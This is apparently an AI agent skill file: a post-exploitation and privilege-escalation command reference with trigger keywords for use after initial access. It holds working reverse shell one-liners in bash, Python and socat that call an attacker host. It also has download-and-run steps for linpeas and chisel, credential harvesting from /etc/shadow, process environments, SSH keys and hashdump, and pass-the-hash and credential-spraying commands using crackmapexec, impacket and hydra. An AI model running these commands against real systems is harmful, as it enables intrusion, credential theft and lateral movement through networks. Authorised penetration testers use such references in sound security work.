| name | pentest-post-exploit |
| description | Post-exploitation and privilege escalation tool reference. Covers proxychains4 (pivoting), smbclient (file access), socat/netcat (relays), and on-demand tools (linpeas, chisel, ligolo-ng, pspy, mimikatz concepts). Use after gaining initial access to escalate privileges and move laterally.
|
| version | 2.0.0 |
| triggers | ["post-exploit","privilege escalation","privesc","lateral movement","pivoting","proxychains","linpeas","chisel","SUID","persistence"] |
Post-Exploitation & Privilege Escalation — Tool Reference
Pivoting with Proxychains4
proxychains4 nmap -sT -Pn -p 80,443,445 <internal_target>
proxychains4 curl http://<internal_target>
proxychains4 ssh user@<internal_target>
ssh -D 1080 -N -f user@<pivot_host>
SMBClient — File Access
smbclient -L //<target>/ -N
smbclient -L //<target>/ -U <user>%<password>
smbclient //<target>/<share> -U <user>%<password>
smbclient //<target>/<share> -N
smbclient //<target>/<share> -U <user>%<password> -c "get <file> /tmp/loot"
Netcat — Reverse/Bind Shells
nc -nlvp 4444
nc -nv <target> 4444
bash -i >& /dev/tcp/<attacker>/4444 0>&1
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("<attacker>",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
Socat — Advanced Relay
socat file:`tty`,raw,echo=0 tcp-listen:4444
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<attacker>:4444
socat tcp-listen:8080,fork tcp:<target>:80
socat openssl-listen:4444,cert=server.pem,verify=0 -
socat - openssl:<attacker>:4444,verify=0
socat udp-listen:53,fork udp:<dns_server>:53
SSH Tunneling
ssh -L 8080:<internal_target>:80 user@<pivot_host>
ssh -R 9090:127.0.0.1:80 user@<remote_host>
ssh -D 1080 -N -f user@<pivot_host>
ssh -L 8080:127.0.0.1:8080 -J user@<jump_host> user@<target>
On-Demand Post-Exploit Tools
LinPEAS / WinPEAS — Privilege Escalation Enumeration
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh -O /tmp/linpeas.sh
chmod +x /tmp/linpeas.sh
/tmp/linpeas.sh | tee /tmp/linpeas_output.txt
python3 -m http.server 8000
Chisel — TCP Tunnel / SOCKS Proxy
wget https://github.com/jpillora/chisel/releases/latest/download/chisel_linux_amd64.gz
gunzip chisel_linux_amd64.gz && chmod +x chisel_linux_amd64
mv chisel_linux_amd64 /usr/local/bin/chisel
chisel server --reverse --port 8888
chisel client <spectre_ip>:8888 R:socks
Ligolo-ng — Advanced Tunneling
pspy — Process Snooping (No Root Needed)
./pspy64
Linux Privilege Escalation Checklist
Run these checks after gaining initial shell access:
id && whoami && groups
sudo -l
find / -perm -4000 -type f 2>/dev/null
find /etc -writable -type f 2>/dev/null
find /var -writable -type f 2>/dev/null
cat /etc/crontab
ls -la /etc/cron.*
crontab -l
ps aux --forest
uname -a
cat /etc/os-release
ss -tulnp
netstat -tulnp 2>/dev/null
find / -name "*.conf" -o -name "*.config" -o -name "*.bak" -o -name "*.old" 2>/dev/null | head -50
find / -name "id_rsa" -o -name "*.pem" -o -name "*.key" 2>/dev/null
env
cat /proc/*/environ 2>/dev/null | tr '\0' '\n'
cat /etc/passwd
cat /etc/shadow 2>/dev/null
ls -la /var/run/docker.sock 2>/dev/null
cat /proc/1/cgroup 2>/dev/null
Windows Post-Exploitation Checklist
getuid
sysinfo
getsystem
hashdump
run post/multi/recon/local_exploit_suggester
whoami /all
net user
net localgroup administrators
systeminfo
ipconfig /all
netstat -ano
tasklist /v
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
dir /s /b C:\Users\*.txt C:\Users\*.doc C:\Users\*.pdf 2>nul
Lateral Movement Patterns
Pass the Hash
crackmapexec smb <targets> -u admin -H '<ntlm_hash>' --shares
crackmapexec smb <targets> -u admin -H '<ntlm_hash>' -x 'whoami'
impacket-psexec -hashes :<ntlm_hash> admin@<target>
impacket-wmiexec -hashes :<ntlm_hash> admin@<target>
Credential Reuse
crackmapexec smb <range>/24 -u <found_user> -p '<found_pass>'
hydra -l <found_user> -p '<found_pass>' ssh://<other_targets>
Tool Selection Guide
| Situation | Best Tool |
|---|
| Pivot to internal network | chisel or ssh -D + proxychains4 |
| Linux privesc enumeration | linpeas.sh |
| Windows privesc enumeration | winPEAS or post/multi/recon/local_exploit_suggester |
| Reverse shell listener | nc -nlvp 4444 or socat |
| File transfer to target | python3 -m http.server + wget/curl |
| Access SMB shares | smbclient |
| Monitor processes without root | pspy |
| Pass the hash attacks | crackmapexec or impacket-psexec |
| Advanced tunneling | ligolo-ng (best) or chisel |